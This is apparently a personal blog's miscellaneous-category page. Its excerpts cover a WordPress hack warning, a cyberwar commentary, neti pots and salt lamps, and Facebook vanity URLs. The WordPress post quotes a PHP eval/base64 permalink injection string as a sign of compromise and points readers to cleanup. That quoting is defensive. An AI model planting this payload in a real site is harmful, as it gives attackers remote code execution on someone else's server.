Black holes, LHC, Star Wars, quantum uncertainty… if it is of general geek interest, but doesn’t fit into one of the other categories, it lands here.

WordPress SQL injection hack: watch for=> %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/


If you are running a WordPress based blog like I am and suddenly notice your post URLs have something “extra” appended (see the subject line), your blog has been hacked.

You can read more about it here (thanks, UCLABoyz, thanks schang!), where you will also find guidance regarding cleaning the problem up. Unfortunately, it appears that the hack works on all versions of WordPress up to and including the most recent.

I have BadBehavior installed on my blog, and so it was rejecting the URLs with this addition which I *think* would be thwarting the hackers involved: they hadn’t been able to create an administrative user. Unfortunately, it also meant none of my blog posts were working properly until I noticed the problem and corrected it.

Hopefully WordPress will issue a fix for this soon. In the meantime, keep an eye on your URLs, WordPress bloggers!

UPDATE: Another link to a lengthy thread regarding this hack on the WordPress.org site. What is interesting here is the apparent vector: a weakness in the WordPress code, apparently up to and including the most recent release, that permits an ordinary subscriber (i.e.: not an administrative user) to run some administrator features e.g.: changing the permalinks.

UPDATE #2: it appears that updating to the most recent version of WordPress (2.8.4) removes the “double slash” vector for running some admin commands (notably permalink.php). This fix was apparently added somewhere between WordPress version 2.8 and 2.8.4.

I’ve included some extracts from my server logs and further thoughts below…


Cyberwar? No, malicious script kiddy

According to the lead Republican on the House Intelligence Committee, Peter Hoekstra, the U.S. should launch an all-out retaliation against North Korea for its role in the recent cyber attacks on American and South Korean internet targets. Unfortunately for the American people, Mr. Hoekstra is either an idiot, willfully ignorant, or intentionally twisting reality for his own political ends. The best experts in the industry agree that the attacks were launched by an attention-seeking amateur.


New age health: Neti pot and Salt crystal lamps


I’m not really a gullible person. I tend to prefer claims backed up by multiple reputable research sources. That said, I am willing to try things that are a bit “out there” if the potential negatives are balanced out sufficiently. I mean, even if something doesn’t really work, if it does little or no harm it may help purely via the placebo effect.

This brings me to a couple of things I’ve invested in recently. The first actually has a fair amount of medical research supporting it. The second is pretty much debunked. Yet I’ve adopted both into my life, well aware of the limitations of each. I’m referring to the use of neti pots (or nasal lavage) to improve sinus health, and to Himalayan salt lamps.


Facebook landrush: 3 million names registered in first day

I’m not really a Facebook user. I set up an account sometime in 2007, and then promptly forgot my login ID and password. Nothing about Facebook really appealed to me: I’m not sure why, perhaps at least partly because a lot of what it does I had already more or less been doing for a decade with my own website/blog.

However, I heard a few weeks ago that the Facebook folks were going to start allowing people to set up personal or “vanity” URLs. So instead of “http://www.facebook.com/profile.php?id=39395883”, you could have something like “http://www.facebook.com/cooldude”. I thought I should probably lay claim to some kind of recognizable URL, and so I dug through my old notes and tried to dredge up my old Facebook account information.
